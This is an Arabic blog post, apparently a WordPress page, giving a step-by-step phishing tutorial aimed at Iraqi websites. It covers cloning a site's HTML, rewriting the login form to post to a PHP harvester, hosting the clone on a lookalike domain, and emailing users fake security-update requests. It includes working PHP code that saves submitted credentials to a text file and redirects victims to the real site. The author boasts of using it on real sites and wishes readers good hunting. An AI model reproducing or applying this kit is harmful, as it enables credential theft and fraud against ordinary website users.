كيفية صيد المواقع العراقية ..وتحويل حسابات المسجلين إليك ..!!!!

تحية طيبة الى زوار المدونــــــة

من اهم طرق قرصنة المواقع العراقية حاليا هي طريقة صيد المواقع والتي تسمى فشنك

Hacking web sites by Phishing method …..?

ماهي الفشنك …..؟؟؟

نتبع الاجراءات التالية

لنفرض نحن نريد صيد حسابات المشتركين في الموقع التالي  

http://www.any-web-site-to-phishing.com

 نتبع الخطوات التالية :-

  1.       نذهب الى شريط الادوات للمستعرض الفايرفوكس موزيلا

  2.       نضغط على view    ثم  page source   لمعاينة المصدر البرمجي المكتوب بلغة  HTML الترابطية التشعبية . وهو لغة ساكنة .

  3.       ثم نقوم بنسخة : edit   —- select all —- copy

  4. .      ثم فتح أي ملف في النوت باد  النصي البسيط ..ولصق الملف فيه وخزنه باسم index.html

  5.       ثم البحث  في الملف اعلاه عن التحرير عن كود برمجي وهو  ”

  6.      

<form method=”get”  action=”http://www.any-web-site-to-phishing.com/phishing.php”&gt;

7-.      وربطه بالبرنامج ادناه … بالصيغة   اسم البرنامج PHISHING.PHP      وملف لخزن الحسابات المستخدمين بصيغة ملف نصي

8. اذا الان لدينا ثلاثة ملفات وهما : index.html

9. وملف phishing.php

10. وملف نصي :accounts.txt

 لكن يجب ان نجد موقع لكي تستضيف تلك الملفات اعلاه … لكن كن حذر والانتباه هناك كثير من مواقع الاستضافة المجانية …..لاتتقبل ملفات الصيد لكي لاتعاقب ضمن قائمة المواقع السوداء التي تم الحضر عليها من حيث الاستضافة ومراقبتها

ان كنت تريد ان تنجخ ويتقبل موقع لاستضافتك عليك البحث والبحث والبحث عن مواقع تستضيف ملفاتك لصيد المواقع عن طريقهم …!!!. بعد ان يتم رفع الملفات ..الى المستضيف … ولتكن بصيغة اسم الموقع تقريبا أي مشابها لاسم الموقع المراد صيده ..!!!!

أي :

www.any-web-site-to-phishing.org

 ثم بعد ذلك نقوم بارسال رسائل اخطار الى جميع المشتركين في هذا الموقع اعلاه

بالقيام بالتحديث لاغراض الامني لحسابهم …وارفاق رابط موقعك المزيف ..!!! اليهم ..!!!

فسوف يدخل المستخدم لتحديث حسابه بعد قراءة الرسالة القادمة من فريق الدعم الفني …!! فسوف يتم ارسال حسابه الى ملف :

Accounts.txt …..!!!

 وبعد عدة مستخدمين لتفعيل رابط الموقع المزيف يتم تسجيل عدد  معين من حسابات المستخدمين …!!

 واليكم كود phishing.php

<?php

header(“Location: http://www.any-web-site-to-phishing.com”);

$handle = fopen(“accounts.txt”, “a”);

foreach($_GET as $variable => $value)

{

fwrite($handle, $variable);

fwrite($handle, “=”);

fwrite($handle, $value);

fwrite($handle, “\r\n”);

}

fwrite($handle, “\r\n”);

fclose($handle);

exit;

?>

 

ملاحظة :-

تم تجريبها على بعض المواقع العراقية …!!! لان صيدها جدا سهلا وبسيطا هههههههههههه

 تحياتي للجميع

وصيدا وفيرا …!! وبالتوفيق

 

 

أضف تعليقاً

إملأ الحقول أدناه بالمعلومات المناسبة أو إضغط على إحدى الأيقونات لتسجيل الدخول:

WordPress.com Logo

أنت تعلق بإستخدام حساب WordPress.com. تسجيل خروج   / تغيير )

صورة تويتر

أنت تعلق بإستخدام حساب Twitter. تسجيل خروج   / تغيير )

Facebook photo

أنت تعلق بإستخدام حساب Facebook. تسجيل خروج   / تغيير )

Google+ photo

أنت تعلق بإستخدام حساب Google+. تسجيل خروج   / تغيير )

Connecting to %s